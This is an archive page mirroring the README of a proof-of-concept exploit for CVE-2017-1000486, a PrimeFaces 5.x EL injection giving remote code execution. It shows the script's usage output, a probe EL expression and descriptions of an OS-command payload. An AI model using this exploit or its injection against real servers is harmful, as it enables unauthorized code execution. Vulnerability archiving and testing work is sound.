Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2017-1000486 PoC — Primetek Primefaces 加密问题漏洞

Source
https://github.com/mogwailabs/CVE-2017-1000486
Associated Vulnerability
Title:Primetek Primefaces 加密问题漏洞 (CVE-2017-1000486)
Description:Primetek Primefaces是一个开源的使用在Java EE系统中的UI库。 Primetek Primefaces 5.x版本中存在加密问题漏洞。远程攻击者可利用该漏洞执行代码。
Description
Proof of Concept Exploit for PrimeFaces 5.x EL Injection (CVE-2017-1000486)
Readme
# CVE-2017-1000486

Proof of Concept Exploit for PrimeFaces 5.x EL Injection (CVE-2017-1000486), a RCE vulnerability that can be used to gain Remote 
Code Execution on a target.

## Vulnerability description
You can find an excellent description of the vulnerability on the [Minded Security blog](https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html).

## Usage

The exploit provides a help function that prints all important parameters

```bash
./primefaces.py --help

PrimeFaces 5.x EL injection exploit (CVE-2017-1000486) by MOGWAI LABS
=====================================================================

usage: primefaces.py [-h] [-t] [-e EXTENSION] url [payload]

PrimeFaces 5.x EL injection exploit

positional arguments:
  url                   The target URL (http/https)
  payload               File with the JavaScript (Rino/Nashorn) code to
                        execute or OS command

optional arguments:
  -h, --help            show this help message and exit
  -t, --test            Test mode (off by default)
  -e EXTENSION, --extension EXTENSION
                        Extension of the target (xhtml, jsf)

```

The exploit provides a simple test mode (-t parameter) that can be used to verify if a target is actually vulnerable. 
This works by sending the following EL-Expression to the target, which will add an additional header field to the HTTP response. 
The header is then checked by the exploit:

```
${facesContext.getExternalContext().setResponseHeader("MOGWAILABS","CHKCHK")}
```

Actual exploitation works by invoking the JavaScript interpreter that is bundeld with the Java VM. This allows to execute 
arbitrary Java Code from JavaScript.

The exploit provides two example payloads:

- payload.js (Execute a OS command)
- sleep.js (Sleep for 4 seconds, causing a delay of the response)

Please note that none of this examples will provide you with the output of the command.
File Snapshot

 [4.0K]  /data/pocs/4b371876b17ba258f3ca246ee40100969996ba8a
├── [  59]  payload.js
├── [4.1K]  primefaces.py
├── [1.9K]  README.md
├── [  23]  requirements.txt
└── [  32]  sleep.js

0 directories, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.